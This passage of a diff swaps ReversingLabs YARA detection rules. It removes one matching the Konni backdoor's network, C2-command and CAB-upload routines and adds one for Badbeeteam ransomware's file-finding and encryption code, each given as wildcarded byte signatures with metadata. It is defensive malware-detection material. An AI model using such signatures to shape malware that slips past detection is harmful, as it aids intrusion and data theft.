-		$write_connection = {
-            7E ?? ?? ?? ?? 0A 16 0B 06 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7E ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 0C 08 8E 69 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 20 ?? ?? ??
-            ?? 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ??
-            09 16 09 8E 69 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 8E 69 20 ?? ?? ?? ?? 3E ?? ?? ?? ??
-            08 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 16 13 ?? 11 ?? 16 6A 7E
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 17 7E ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ?? 11 ?? 16 11 ??
-            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 16 11 ?? 8E 69 7E ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 25 13 ?? 16 3D ?? ?? ?? ?? DD ?? ?? ?? ?? 11 ?? 39 ?? ?? ?? ?? 11 ?? 7E ?? ?? ??
-            ?? 28 ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            3A ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ?? 08 16 08 8E 69 7E ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 7E ?? ?? ??
-            ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 07 39 ?? ?? ?? ?? 06 7E
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 89 4D ?? 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
+            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 C6 45 ?? ?? 33 D2 55 68 ?? ?? ?? ?? 64 FF
+            32 64 89 22 B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B D8 8B C3 8B D8 F6 C3 ?? 74 ?? 66 83 E3 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B C3
+            E8 ?? ?? ?? ?? 8B D0 B1 ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 4D ?? B2 ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 D2
+            55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 8B 10 FF 12 8B C8 8B 55 ?? A1 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B C8 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 88 45 ?? 33 C0 5A 59 59 64
+            89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ??
+            ?? EB ?? 80 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 45 ?? 89 45 ?? C6 45 ?? ?? B8 ?? ?? ?? ??
+            89 45 ?? C6 45 ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 88 45
+            ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? E9
         }
-		$read_sorter_enumerator = {
-            03 3A ?? ?? ?? ?? DD ?? ?? ?? ?? 03 75 ?? ?? ?? ?? 3A ?? ?? ?? ?? 03 75 ?? ?? ?? ??
-            0A 06 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 25 3A ?? ?? ??
-            ?? 26 38 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 DD ?? ?? ?? ??
-            73 ?? ?? ?? ?? 25 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 07 7E ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 25 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 7E ?? ?? ?? ??
-            28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 80 ??
-            ?? ?? ?? 38 ?? ?? ?? ?? 14 0C 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 7E
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 38 ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 3A ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 28 ?? ??
-            ?? ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DD
-            ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28
+		$find_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 8B FA 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 7C ?? 8B 45 ?? 66
+            83 3C 58 ?? 75 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? E8 ?? ?? ?? ??
+            8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 8D 45 ?? 50 8D 53 ?? 8B CE 8B 45 ?? E8 ?? ?? ??
+            ?? 8B C7 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8
+            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B C7 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68
+            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $run_visual_executor ) and ( $execute_mixed_executor ) and ( $write_connection ) and ( $read_sorter_enumerator )
+		uint16( 0 ) == 0x5A4D and ( $generate_key ) and ( $find_files ) and ( $encrypt_files )
 }
-rule REVERSINGLABS_Win64_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Badbeeteam : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Konni backdoor."
+		description = "Yara rule that detects Badbeeteam ransomware."
 		author = "ReversingLabs"
-		id = "c45c23c6-be15-58cc-ae4d-631bed4a3bb2"
-		date = "2023-12-07"
-		modified = "2023-12-07"
+		id = "39490b21-34b9-51cb-a3ed-672b3186a233"
+		date = "2020-11-13"
+		modified = "2020-11-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.Konni.yara#L1-L205"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Badbeeteam.yara#L1-L137"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "37c45e3ed23ca9f4de876f666c9f6d9bf7eee5cb1650b02cdd9f58e2ccc4b5cb"
+		logic_hash = "9b5367655c7c70958332d31524833d96d03027aab693393b19f478a80482abd0"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Konni"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Badbeeteam"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$network_communication_p1 = {
-            48 8B C4 53 55 57 41 54 41 55 41 56 41 57 48 83 EC ?? 48 8B 3D ?? ?? ?? ?? 45 33 FF
-            48 8B D9 4C 8D A7 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 49 8B CC 44 89 78 ?? 44 89 78
-            ?? 45 8B F7 44 89 78 ?? 41 8B EF E8 ?? ?? ?? ?? 4C 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 49 8B CC 48 89 5C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 9F
-            ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 45 33 C9 45 33 C0 33 C9 41 8B
-            D5 44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 89 44 24 ?? 48 85 C0 75 ?? 83 C8 ??
-            48 83 C4 ?? 41 5F 41 5E 41 5D 41 5C 5F 5D 5B C3 4C 89 7C 24 ?? 44 89 7C 24 ?? 41 B8
-            ?? ?? ?? ?? 45 33 C9 48 8B D3 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? 48 89 B4 24 ?? ?? ??
-            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85
-            C0 0F 84 ?? ?? ?? ?? 4C 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45
-            33 C9 4D 8B C4 48 8B C8 4C 89 7C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24
-            ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 45 33 C9 45 33 C0 33 D2 48 8B C8 44 89
-            7C 24 ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 48 8B CB 85 C0 74 ?? 48 8D 94 24 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 48 8B CB 45 33 C0 33 D2 FF 15 ?? ?? ??
-            ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ??
-            41 8B C5 E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB EB ?? FF C0 B9 ??
-            ?? ?? ?? 8B D0 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 74 ?? 44 8B
-        }
-		$network_communication_p2 = {
-            84 24 ?? ?? ?? ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8D 0D ??
-            ?? ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 4C 8B E8 48 8B CB 48 83 F8 ?? 75 ?? 45 33 C9 45 33 C0 33 D2 FF 15
-            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ??
-            ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49
-            8B D4 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 1F 00 44 39 BC 24
-            ?? ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 49 8B CC 41 8B EF E8 ?? ?? ?? ?? 48 85 C0 0F
-            45 EF 3B EF 74 ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4 49 8B CD
-            4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 44 03 B4 24 ?? ?? ?? ?? 33
-            D2 49 8B CC E8 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4
-            48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B CD FF 15 ??
-            ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 48 8B CB FF 15 ?? ?? ??
-            ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ??
-            83 C8 ?? 45 85 F6 0F 44 E8 8B C5 48 8B B4 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F 41 5E 41
-            5D 41 5C 5F 5D 5B C3
-        }
-		$handle_c2_commands_p1 = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4
-            48 89 84 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 8D 54 24 ?? 33 FF 48 8B CE 89 7C 24
-            ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ??
-            ?? ?? 48 8B 08 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B
-            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            75 ?? 48 8B 4B ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 41 B8
-            ?? ?? ?? ?? 66 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 53 ?? 48 8D 0D ??
-            ?? ?? ?? 45 33 C0 FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ??
-            ?? ?? ?? 69 C0 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48
-            8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 69 C0 ?? ?? ?? ?? 89
-        }
-		$handle_c2_commands_p2 = {
-            05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8
-            ?? ?? ?? ?? 48 8B CE 85 C0 75 ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 D2 E8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 0B E8 ?? ?? ?? ?? 48 63 4C 24 ??
-            48 8B 15 ?? ?? ?? ?? 48 8B 4C CB ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 63 4C
-            24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 3B 48 83
-            C9 ?? 33 C0 66 F2 AF 33 D2 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? 48 8B 3B 48 83
-            C9 ?? 33 C0 66 F2 AF 8D 50 ?? 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 48 8B CB FF 15 ?? ?? ?? ??
-            8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B
-            5B ?? 49 8B 73 ?? 49 8B E3 5F C3
-        }
-		$create_cab_file_and_upload_p1 = {
-            48 89 5C 24 ?? 55 56 57 41 54 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48
-            8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 4C 8B 3D ?? ?? ?? ?? 33 DB 48 8B F1
-            48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? 44 8B E3 89 5C 24 ?? 89 5C 24 ?? 66 89 5D ?? E8
-            ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 9D ?? ?? 00 00 E8 ??
-            ?? ?? ?? 33 C0 48 8D 4C 24 ?? 66 89 5C 24 ?? 48 89 44 24 ?? 89 44 24 ?? 66 89 44 24
-            ?? FF 15 ?? ?? ?? ?? 0F B7 54 24 ?? 0F B7 4C 24 ?? 44 0F B7 44 24 ?? 0F B7 44 24 ??
-            0F B7 7C 24 ?? 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 7C 24 ?? 44 89 44 24 ?? 4C 8D
-            05 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? B9 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 4C 8D 4D ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 45 33 C0 FF 15 ?? ?? ??
-            ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 53 ?? 48 8B CE E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
-            ?? 48 8B C8 48 8B F8 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ??
-            ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D
-            15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8
-            ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
+            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ??
+            8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ??
+            8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57
+            57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ??
+            ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8
+            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ??
+            3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D
         }
-		$create_cab_file_and_upload_p2 = {
-            8D 4D ?? 48 8B D6 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 48 8D 55 ?? 45
-            33 C0 48 8B CE FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? 48 8D 4D ?? 45 8D 41 ?? BA
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 ?? 75 ?? 8B C3 EB ?? 33 D2 48 8B C8
-            FF 15 ?? ?? ?? ?? 8B F0 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B C3 EB ?? FF C6 B9
-            ?? ?? ?? ?? 8B D6 44 8B EE FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 75 ?? 48 8B CF FF 15
-            ?? ?? ?? ?? 8B C3 EB ?? 4D 8B C5 33 D2 48 8B C8 E8 ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B
-            C6 49 8B D4 48 8B CF 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B
-            44 24 ?? 89 44 24 ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8D 4D ?? 4C 89 B4 24 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 44 8B 6C 24 ?? B9 ?? ?? ?? ?? 41 83 C5 ?? 41 8B FD 41 8B
-            D5 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B C7 33
-            D2 48 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 33
-            C0 48 83 C9 ?? 4C 8D 86 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 66 F2 AF 49 89 00 49 89 40
-            ?? 48 F7 D1 49 89 40 ?? 49 89 40 ?? 48 FF C9 03 C9 74 ?? 8B D1 48 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? EB ?? 48 8B F3 49 89 B7 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 44 8B
+		$find_files_p2 = {
+            56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ??
+            ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D
+            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ??
+            75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ??
+            ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2
+            C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
+            ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
         }
-		$create_cab_file_and_upload_p3 = {
-            44 24 ?? 4D 8B CE 49 8B D4 48 8B CE 44 89 6C 24 ?? E8 ?? ?? ?? ?? 49 8B 8F ?? ?? ??
-            ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 49 8B CC 49 89 9F ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48
-            83 C9 ?? 33 C0 48 8D BD ?? ?? ?? ?? 66 F2 AF 48 F7 D1 41 8D 84 4D ?? ?? ?? ?? B9 ??
-            ?? ?? ?? 8B D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 0F 84 ?? ?? ?? ?? 44
-            8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 8B 54 24 ?? 4C 8D 8D ?? ?? ?? ?? 4C 8D 05
-            ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B D6 8B C8 4C 8B C7 89 44 24
-            ?? 49 03 CD E8 ?? ?? ?? ?? 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 03 CF 41 B8 ?? ?? ??
-            ?? 49 03 CD E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 45 33 C9 45 33 C0 41 8D 51 ?? 33 C9 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48
-            85 C0 0F 84 ?? ?? ?? ?? 48 89 5C 24 ?? 89 5C 24 ?? 49 8D 97 ?? ?? ?? ?? 41 B8 ?? ??
-            ?? ?? 45 33 C9 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24
-            ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 0F 84 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? 33 D2
-            41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4D 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 49 8D 8F
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 7C 24 ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? C7 44 24 ??
